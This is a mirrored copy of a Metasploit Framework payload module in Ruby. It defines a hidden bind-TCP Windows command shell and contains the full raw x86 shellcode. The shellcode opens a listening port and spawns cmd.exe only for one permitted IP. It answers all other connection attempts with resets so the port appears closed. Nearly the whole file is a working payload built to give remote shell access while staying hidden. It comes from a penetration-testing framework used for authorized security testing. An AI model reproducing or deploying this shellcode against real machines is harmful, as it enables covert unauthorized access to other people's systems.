Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb
19516 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
module MetasploitModule
7
CachedSize = 386
8
9
include Msf::Payload::Windows
10
include Msf::Payload::Single
11
include Msf::Sessions::CommandShellOptions
12
13
def initialize(info = {})
14
super(
15
merge_info(
16
info,
17
'Name' => 'Windows Command Shell, Hidden Bind TCP Inline',
18
'Description' => %q{
19
Listen for a connection from certain IP and spawn a command shell.
20
The shellcode will reply with a RST packet if the connections is not
21
coming from the IP defined in AHOST. This way the port will appear
22
as "closed" helping us to hide the shellcode.
23
},
24
'Author' => [
25
'vlad902', # original payload module (single_shell_bind_tcp)
26
'sd', # original payload module (single_shell_bind_tcp)
27
'Borja Merino <bmerinofe[at]gmail.com>' # Add Hidden ACL functionality
28
],
29
'License' => MSF_LICENSE,
30
'References' => [['URL', 'http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html']],
31
'Platform' => 'win',
32
'Arch' => ARCH_X86,
33
'Handler' => Msf::Handler::BindTcp,
34
'Session' => Msf::Sessions::CommandShell,
35
'Payload' => {
36
'Offsets' =>
37
{
38
'LPORT' => [ 193, 'n' ],
39
'AHOST' => [ 255, 'ADDR' ],
40
'EXITFUNC' => [ 356, 'V' ]
41
},
42
'Payload' =>
43
"\xFC\xE8\x82\x00\x00\x00\x60\x89\xE5\x31\xC0\x64\x8B\x50\x30\x8B" \
44
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\xAC\x3C" \
45
"\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF2\x52\x57\x8B\x52" \
46
"\x10\x8B\x4A\x3C\x8B\x4C\x11\x78\xE3\x48\x01\xD1\x51\x8B\x59\x20" \
47
"\x01\xD3\x8B\x49\x18\xE3\x3A\x49\x8B\x34\x8B\x01\xD6\x31\xFF\xAC" \
48
"\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF6\x03\x7D\xF8\x3B\x7D\x24\x75" \
49
"\xE4\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3" \
50
"\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF" \
51
"\xE0\x5F\x5F\x5A\x8B\x12\xEB\x8D\x5D\x68\x33\x32\x00\x00\x68\x77" \
52
"\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8\x90\x01\x00\x00" \
53
"\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50\x50\x50\x50\x40" \
54
"\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x31\xDB\x53\x68\x02" \
55
"\x00\x11\x5C\x89\xE6\x6A\x10\x56\x57\x68\xC2\xDB\x37\x67\xFF\xD5" \
56
"\x6A\x01\x54\x68\x02\x30\x00\x00\x68\xFF\xFF\x00\x00\x57\x68\xF1" \
57
"\xA2\x77\x29\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF\xD5\x53\xE8" \
58
"\x17\x00\x00\x00\x8B\x44\x24\x04\x8B\x40\x04\x8B\x40\x04\x2D\xC0" \
59
"\xA8\x01\x21\x74\x03\x31\xC0\x40\xC2\x20\x00\x53\x53\x57\x68\x94" \
60
"\xAC\xBE\x33\xFF\xD5\x40\x74\xD6\x48\x57\x97\x68\x75\x6E\x4D\x61" \
61
"\xFF\xD5\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x31\xF6\x6A\x12" \
62
"\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01\x8D\x44\x24\x10\xC6" \
63
"\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E\x56\x56\x53\x56\x68\x79" \
64
"\xCC\x3F\x86\xFF\xD5\x89\xE0\x4E\x56\x46\xFF\x30\x68\x08\x87\x1D" \
65
"\x60\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C" \
66
"\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53" \
67
"\xFF\xD5"
68
}
69
)
70
)
71
72
register_options([
73
OptAddress.new('AHOST', [true, 'IP address allowed', nil])
74
])
75
end
76
end
77
78